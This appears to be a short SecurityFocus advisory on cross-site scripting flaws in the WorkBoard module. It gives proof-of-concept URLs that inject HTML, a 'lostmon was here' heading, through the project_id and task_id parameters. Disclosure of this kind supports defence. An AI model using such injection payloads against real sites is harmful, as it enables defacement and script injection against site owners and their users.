WorkBoard Multiple Cross-Site Scripting Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:

http://www.example.com/modules.php?name=WorkBoard&file=project&project_id=3[XSS_code]

http://www.example.com/modules.php?name=WorkBoard&file=project&project_id=
2%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E

http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=7[XSS_code]

http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=
5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E


 

Privacy Statement
Copyright 2010, SecurityFocus